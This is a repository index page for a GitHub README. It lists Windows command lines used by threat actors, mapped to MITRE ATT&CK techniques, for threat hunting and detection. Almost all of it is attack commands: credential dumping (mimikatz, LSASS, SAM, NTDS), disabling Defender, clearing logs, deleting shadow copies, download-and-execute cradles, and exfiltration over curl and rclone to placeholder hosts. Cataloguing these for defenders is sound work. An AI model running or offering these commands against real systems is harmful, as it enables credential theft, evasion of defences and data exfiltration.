Data

Tools

Indexes

Applications

Experiments

Open Source Science

threatactorprocedures-mitre-attack

A collection of specific commands used by threat actors, detailing their procedural implementations of tactics and techniques from the MITRE ATT&CK framework.

https://github.com/jacobstickney/threatactorprocedures-mitre-attack

Science Score: 44.0%

This score indicates how likely this project is to be science-related based on various indicators:

  • CITATION.cff file
    Found CITATION.cff file
  • codemeta.json file
    Found codemeta.json file
  • .zenodo.json file
    Found .zenodo.json file
  • DOI references
  • Academic publication links
  • Academic email domains
  • Institutional organization owner
  • JOSS paper metadata
  • Scientific vocabulary similarity
    Low similarity (7.4%) to scientific vocabulary

Keywords

cmd cybersecurity detection-engineering dfir lolbins mitre-attack networksecurity powershell threat-hunting windows
Last synced: 6 months ago · JSON representation ·

Repository

A collection of specific commands used by threat actors, detailing their procedural implementations of tactics and techniques from the MITRE ATT&CK framework.

Basic Info
  • Host: GitHub
  • Owner: jacobstickney
  • Default Branch: main
  • Homepage:
  • Size: 126 KB
Statistics
  • Stars: 7
  • Watchers: 1
  • Forks: 2
  • Open Issues: 0
  • Releases: 0
Topics
cmd cybersecurity detection-engineering dfir lolbins mitre-attack networksecurity powershell threat-hunting windows
Created almost 2 years ago · Last pushed about 1 year ago
Metadata Files
Readme Citation

README.md

ThreatActorProcedures-MITRE-ATTACK

Threat actor procedures (the “P” in TTPs) are specific implementations of the tactics and techniques outlined in the MITRE ATT&CK framework. They are the specific actions that threat actors take on a system or network after they have gained access. These actions often involve the use of command line activities.

These behaviors are specific procedural implementations of broader techniques that adversaries use to accomplish their goals. These techniques, such as System Network Configuration Discovery or Process Discovery, are linked to specific actions that illustrate how these techniques are implemented in real-world scenarios.

This is an ongoing collection of commands used by threat actors to perform various actions on a compromised system, accompanied by their respective MITRE ATT&CK technique reference numbers.

System Information Discovery [T1082]
systeminfo net config workstation tasklist /svc ping -n 1 <remote_host> net view wmic product get name wmic os caption wmic process | find <security_product_process> wmic volume list brief wmic service brief wmic product list brief wmic baseboard list full netsh interface firewall show all netsh interface portproxy show all netsh interface portproxy show v4tov4 netsh firewall show all netsh portproxy show v4tov4 reg query hklm\software\

System Network Connections Discovery [T1049]

ipconfig /all route print arp -a netstat -an qwinsta nslookup MACHINE_DOMAIN_NAME

Account Discovery: Domain Account (Active Directory) [T1087.002]

net accounts /domain net user <user_name> /domain net user Administrator /domain nltest dclist: nltest /domain_trusts /all_trusts net config workstation net groups /domain net group "domain controllers" /domain net group "Domain Admins" /domain net group "domain computers" /domain net group "enterprise admins" /dom net localgroup "administrators" /dom net time /domain net share setspn.exe -F -Q */* dsquery group -name "<groupname>" | dsget group -members Get-MsolUser <user> Get-MsolUser -UserPrincipalName <user> adfind -gcb -sc trustdmp adfind f "(objectcategory=group)" adfind -subnets -f (objectCategory=subnet) adfind -f (objectcategory=organizationalUnit) adfind -f objectcategory=computer -csv name operatingSystem adfind -f objectcategory=computer adfind -f (objectcategory=person) adexplorer -snapshot

Domain Trust Discovery [T1482]

nltest /domain_trusts nltest /dclist:<victim_domain> netdom trust <domain_name> dsquery * -filter "(objectClass=trustedDomain)" net view /domain dsget domain <domain_name> -trus Get-ADTrust -Filter * Get-NetDomainTrust Get-ADDomainController -Discover Test-NetConnection -ComputerName <domain_controller_name> Get-NetForestDomain Get-ADDomain <domain_name> | Select-Object Name, Trusts Get-ADTrustRelationship -Domain <domain_name>

Query Registry [T1012]

reg query hkcu\<domain_user_sid>\Software\Microsoft\Office\14.0\ Outlook /s | find "<victim_domain_name>" cmd /c tasklist wmic process | find "<process_name>"

Remote System Discovery [T1018]

cmd /c wmic product get name dir \\<ip>\c$\windows\system32\tasks ping <domain_name> ping <ip_address>

(&(&(&(objectClass=Computer)(dnshostname=*))(operatingsystem=*))(servicePrincipalName=*))

Network Share Discovery [T1135]

cmd.exe /C net group "domain admins" /domain" cmd.exe /C net group /d

Permission Groups Discovery [T1069]

net group "domain computers" /do

Domain Trust Discovery [T1482]

nltest /dclists nltest /domain_trusts nltest /dclist:<domain>

OS Credential Dumping: LSASS Memory [T1003.001]

procdump.exe -accepteula -ma lsass.exe С:\Windows\Temp\mem.dmp procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\mem.dmp cmd.exe /C tasklist /svc | findstr lsass rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full

OS Credential Dumping: MimiKatz [T1003.001]

msdol.exe privilege::debug sekurlsa::logonpasswords exit sekurlsa::Minidump lsassdump.dmp cmd.exe /C mimikatz.exe privilege::debug sekurlsa::logonPasswords full samdump::hashes exit > "c:\pathtooutfile\<output_file>.txt" cmd.exe powershell -ep bypass -C "import-module .\katz.ps1;Invoke-Katz" > <output_file>.txt

OS Credential Dumping: Security Account Manager [T1003.002]

reg save hklm\sam sam.hive reg save hklm\system sys reg save hklm\security sec

Process Discovery [T1057]

tasklist.exe /svc powershell.exe Get-Process

System Network Configuration Discovery: Internet Connection Discovery [T1016]

ping.exe -n 1 -a <ip_address>

System Owner/User Discovery [T1033]

whoami whoami /all whoami /upn quser.exe quser quser.exe whoami net user net user <username> net user /domain net user <username> /domain

Steal or Forge Kerberos Tickets: Kerberoasting [T1558.003]

powershell.exe $Null = [Reflection.Assembly]::LoadWithPartialName( 'System.IdentityModel' ); $search = New-Object DirectoryServices.DirectorySearcher( [ADSI]'' ); $search.filter = '(&(servicePrincipalName=*)(objectCategory=user))'; $results = $search.Findall(); foreach ( $results in $results ) { $u = $results.GetDirectoryEntry(); samAccountName = $u.samAccountName; foreach ( $s in $u.servicePrincipalName )

Event Triggered Execution: Image File Execution Options Injection [T1546.012]

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<target_file>.exe" /v Debugger /d "<threat_actor_file>.<ext>" reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<target_file>.exe" /v GlobalFlag /t REG_DWORD /d <GlobalFlag_registry_entry_value>

Lateral Tool Transfer via SMB [T1570]

cmd.exe /C copy * \\<remote_ip>\C$\windows\destination\folder

Exfiltration Over Web Service [T1567]

cmd.exe /C curl -F "file=@$selfpath\<filename>.rar" --ssl-no-revoke https[:]//<web_service>.io

Impair Defenses: Disable or Modify Tools [T1562.001]

PowerShell -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $True "$windir\$system32\WindowsPowerShell\v1.0\PowerShell.exe" Add-MpPreference -ExclusionPath "\$path\to\file.ext" schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableArchiveScanning $true Set-MpPreference -DisableBehaviorMonitoring $true Set-MpPreference -Disable IOAVProtection $true Set-MpPreference -Disable Intrusion PreventionSystem $true Set-MpPreference -DisableScanningNetworkFiles $true Set-MpPreference -MAPSReporting Set-MpPreference -DisableCatchupFullScan $True REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0x0 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0x0 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 0x1 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 0x1 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 0x1 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d 0x0 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 0x2 /f REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v "NotificationSuppress" /t REG_DWORD /d 0x1 /fe powershell.exe Uninstall-WindowsFeature -Name Windows-Defender-GUI wmic /node:"<IP_Address>" process call create "powershell Set-MpPreference -DisableRealtimeMonitoring $true"

Create or Modify System Process: Windows Service [T1543.003]

sc <server_IP> create <service_name> <option1> <option2> sc <server_IP> config <service_name> binpath= “<path_to_executable>” sc <service_name> binpath= “<path_to_executable>”

Ingress Tool Transfer [T1105]

powershell.exe -exec bypass -C IEX ((New-Object Net.WebClient).downloadstring('http[:]//<url>/file.ext')) powershell.exe -exec bypass -C IEX ((new-object net.webclient).downloadstring('http[:]//<url>/file.ext')) powershell.exe -exec bypass -C IEX ((new-object net.tneilCbeW).daolnwoDstring('http[:]//<url>/file.ext')) powershell.exe -exec bypass -C IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString('http[:]//<url>/file.ext')) powershell.exe Invoke-WebRequest -Uri "https[:]//<url>/file.ext" -OutFile c:\file.ext -UseBasicParsing" powershell.exe iwr -Uri "https[:]//<url>/file.ext" -OutFile c:\<output_file>.ext -UseBasicParsing" сmd.exe /c PowerShell iwr -Uri http://<IP_address>:<port>/<file_name>.ext -OutFile c:\<output_file>.ext -UseBasicParsing PowerShell -Command $wc = New-Object System.Net.WebClient; $tempfile = [System. IO.Path]::GetTempFileName(); $tempfile += '.<ext>'; $wc.DownloadFile('[URL]', $tempfile); & $tempfile ; Remove-Item -Force $tempfile powershell.exe -exec bypass -C Invoke-WebRequest "http:/<IP_address>:<port>/<file_name>.ext" -OutFile "<output_file>.ext" powershell.exe -C wget "http[:]//<IP_address>:<port>/<file_name>.ext" -OutFile "<output_file>.ext" cmd.exe /c certutil -urlcache -split -f hxxp[:]//<IP_address>:<port>/<file_name>.ext $path\to\outfile\<output_file>.ext

Indicator Removal: Clear Windows Event Logs [T1070.001]

wevtutil cl system wevtutil cl security wevtutil cl application

Remote Services: SMB/Windows Admin Shares [T1021.002]

net use \\<remote ip> "<password>" /u:<domain>\<username>

Scheduled Task/Job: Scheduled Task [T1053.005]

schtasks /s <remote_host> /tn <task_name> /u <domain>\<username> /p <password> /create /ru system /sc schtasks /create -s <remote> /tn <task_name> /tr <path_to_executable> /sc <schedule_type> /st <start_time> schtasks /create /ru <user> /sc <service_name> /tn <task_name>

Indicator Removal: Clear Persistence [T1070.009]

schtasks /s <remote_host> /tn one /u <domain>\<username> /p <password> /f /delete

OS Credential Dumping: NTDS [T1003.003]

wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full <file_path> wmic process call create "ntdsutil \"activate instance ntds\" ifm \"create full <file_path> wmic process call create "cmd.exe /c ntdsutil \"ac i ntds\" ifm \"create full <file_path> wmic process call create "cmd.exe /c mkdir <file_path> & ntdsutil \"ac i ntds\" ifm \"create full <file_path> ntdsutil.exe 'ac i ntds' 'ifm' 'create full С:\Windows\temp\<folder>' q q ntdsutil.exe 'activate instance ntds' 'ifm' 'create full С:\Windows\temp\<folder>' q q

Network Share Connection Removal [T1070.005]

net use * /delete /y

File and Directory Discovery [T1083]

echo list volume | diskpart echo lis vol | diskpart wmic /node:<IP_address> /user:"<user>" /password:"<password>" logicaldisk get caption,description,drivetype,providername,volumename Get-CimInstance win32_logicaldisk

BITS Jobs [T1197]

cmd.exe /c bitsadmin /transfer n http[:]//<IP_address>:<port>/<file_name>.ext $public\Downloads\<output_file>.ext powershell.exe Start-BitsTransfer -Source http[:]//<IP_address>/pathto/<file_name>.ext -Destination C:\\Users\\pathtofile\\<output_file>.ext -transfertype download

System Services: Service Execution [T1569.002]

sc.exe \\TARGET start <service_name>

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

cmd.exe /Q /c esentutl.exe /y

``` Google Chrome $user\$appdata\Google\Chrome\User Data.\Bookmarks $user\$appdata\Google\Chrome\User Data.\Cookies $user\$appdata\Google\Chrome\User Data.\Login Data $user\$appdata\Google\Chrome\User Data.\Web Data $user\$appdata\Google\Chrome\User Data.*\Web Data-journal $user\$appdata\Google\Chrome\User Data\Local State

Mozilla Firefox $user\$appdata\Mozilla\Firefox\Profiles.\cookies $user\$appdata\Mozilla\Firefox\Profiles.\key3.db $user\$appdata\Mozilla\Firefox\Profiles.\key4.db $user\$appdata\Mozilla\Firefox\Profiles.\logins.json $user\$appdata\Mozilla\Firefox\Profiles.*\places.sqlite

Opera $user\$appdata\Opera Software\Opera Stable\User Data.\Bookmarks $user\$appdata\Opera Software\Opera Stable\User Data.\Cookies $user\$appdata\Opera Software\Opera Stable\User Data.\Login Data $user\$appdata\Opera Software\Opera Stable\User Data.\Web Data $user\$appdata\Opera Software\Opera Stable\User Data\Local State $user\$appdata\Opera\Opera Next\User Data.\Bookmarks $user\$appdata\Opera\Opera Next\User Data.\Cookies $user\$appdata\Opera\Opera Next\User Data.\Login Data $user\$appdata\Opera\Opera Next\User Data.\Web Data $user\$appdata\Opera\Opera Next\User Data\Local State

Microsoft Edge $user\$appdata\Microsoft\Edge\User Data.\Bookmarks $user\$appdata\Microsoft\Edge\User Data.\Cookies $user\$appdata\Microsoft\Edge\User Data.\Login Data $user\$appdata\Microsoft\Edge\User Data.\Web Data $user\$appdata\Microsoft\Edge\User Data\Local State ```

Windows Management Instrumentation [T1047]

gwmi Get-WmiObject -Query “select * from Win32_Service” Get-WmiObject -Class Win32_Service Get-CimInstance -ClassName Win32_ComputerSystem Get-WmiObject win32_processor Get-WmiObject CIM_PhysicalMemory Get-WmiObject –ComputerName <host> –Class Win32_ComputerSystem | Select-Object UserName wmic.exe os get /FORMAT:”http://<IP_address>:<port>/ <file_name>.exe”

Device Driver Discovery [T1652]

powershell.exe Get-SystemDriver

System Service Discovery [T1007]

powershell.exe gsv powershell.exe Get-Service powershell.exe Get-CimInstance -ClassName Win32_Service

sc query <service_name>

Use Alternate Authentication Material: Pass the Hash [T1550.002]

<mimikatz>.exe "privilege::debug" "sekurlsa::logonpasswords" exit > <output_file>.txt <mimikatz>.exe "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>" exit * File name is often changed

Log Enumeration [T1654]

powershell.exe get-eventlog security powershell.exe -c "get-eventlog 'Security'

Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]

powershell.exe InvokeModule -module awscollector -awskey <key_value> -awssecret <aws_secret> -awss3bucket <domain> -awsregion <region> -handleSystems <target_host> rclone.exe copy "\\SERVER.domain.name\path"

Inter-Process Communication [T1559]

\postex_* \postex_ssh_* \status_* \msagent_* \MSSE-* \*-server \wkssvc* \DserNamePipe* \mojo.* \spoolss_* \srvsvc_* \win_svc* \ntsvcs* \winsock \UIA_PIPE * Cobalt Strike named pipes

Create Account: Local Account [T1136.001]

net user sys <username> /add net localgroup %AdmGroup% sys /add

Remote Services: Remote Desktop Protocol [T1021.001]

net localgroup "%RDPGroup%" sys /add netsh advfirewall firewall add rule name= "Open Port 3389" dir=in action=allow protocol=TCP localport=3389

Inhibit System Recovery [T1490]

wmic shadowcopy delete powershell.exe -Command Get-WmiObject Win32_Shadowcopy | Remove-WmiObject vssadmine delete shadows /all /quiet bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy ignoreallfailures

Software Discovery: Security Software Discovery [T1518.001]

wmic /Node:localhost /Namespace:\\remotepath Path AntiVirusProduct Get * /Format:List sc query WinDefend

Get-MpComputerStatus

Modify System Image [T1601]

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<vulnerable_service_name>" /v ImagePath /t REG_SZ /d "C:\pathto\<payload.ext>” reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl001\Services\<vulnerable_service_name>" /v ImagePath /t REG_SZ /d "C:\pathto\<payload.ext>” reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl002\Services\<vulnerable_service_name>" /v ImagePath /t REG_SZ /d "C:\pathto\<payload.ext>”

Impair Defenses: Disable or Modify System Firewall [T1562.004]

netsh advfirewall set currentprofile state off netsh interface portproxy add v4tov4 listenaddress=<ip_address> listenport=<listening_port> connectaddress=<internal_ip_address> connectport=<connect_port> protocol=tcp” netsh advfirewall firewall add rule dir=in name="<name>" program=<file_path> service=rpcss action=allow protocol=TCP localport=<port>

Obfuscated Files or Information [T1027]

powerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand <Base64_encoded_string>

System Binary Proxy Execution: Rundll32 [T1218.011]

rundll32 comsvcs.dll,MiniDump <PID> <file_name>.bin full

System Binary Proxy Execution: Mshta [T1218.005]

mshta.exe vbscript:(CreateObject("WScript.Shell").Run("<file_name>.exe",0)) (Window.Close) mshta.exe http[:]//<IP_address>/<file_name>.hta

Owner

  • Login: jacobstickney
  • Kind: user

Citation (CITATION.cff) 

*Kaspersky. (2023). Modern Asian APT Groups: Tactics, Techniques and Procedures.
Technical documentation. Microsoft Learn. https://learn.microsoft.com/en-us/docs 
The DFIR report. (2024, April 29). The DFIR Report. https://thedfirreport.com/ 
ImagePath – Penetration testing lab. (2020, January 22). Penetration Testing Lab. https://pentestlab.blog/tag/imagepath/ 
*#StopRansomware: Akira Ransomware | CISA. (2024, April 18) . https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a 
*#StopRansomware: Phobos Ransomware | CISA. (2024, February 29). Cybersecurity and Infrastructure Security Agency CISA. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a 
MaNikhilHo. (2023, October 5). Everybody LOLs, sometimes. - MaNikhilHo - Medium. *Medium*. https://medium.com/@realnikhiljyapu/everybody-lols-sometimes-1a5e4a49e898 
Reaves, J. (2021, September 2). Sarwent malware continues to evolve with updated command functions - SentinelLabs*. SentinelOne. https://www.sentinelone.com/labs/sarwent-malware-continues-to-evolve-with-updated-command-functions/ 
Black Hills Information Security. (2024, February 8). "Domain Goodness – How I learned to LOVE AD Explorer". Black Hills Information Security. https://www.blackhillsinfosec.com/domain-goodness-learned-love-ad-explorer/
CrowdStrike. (2023). 8 LOLBins Every Threat Hunter Should Know.
CrowdStrike. (2023). CrowdStrike 2023 Threat Hunting Report.
Splunk. (2024, April 17). "Detecting & Hunting Named Pipes: A Splunk Tutorial". https://www.splunk.com/en_us/blog/security/named-pipe-threats.html

GitHub Events

Total
  • Watch event: 1
  • Push event: 2
  • Fork event: 3
Last Year
  • Watch event: 1
  • Push event: 2
  • Fork event: 3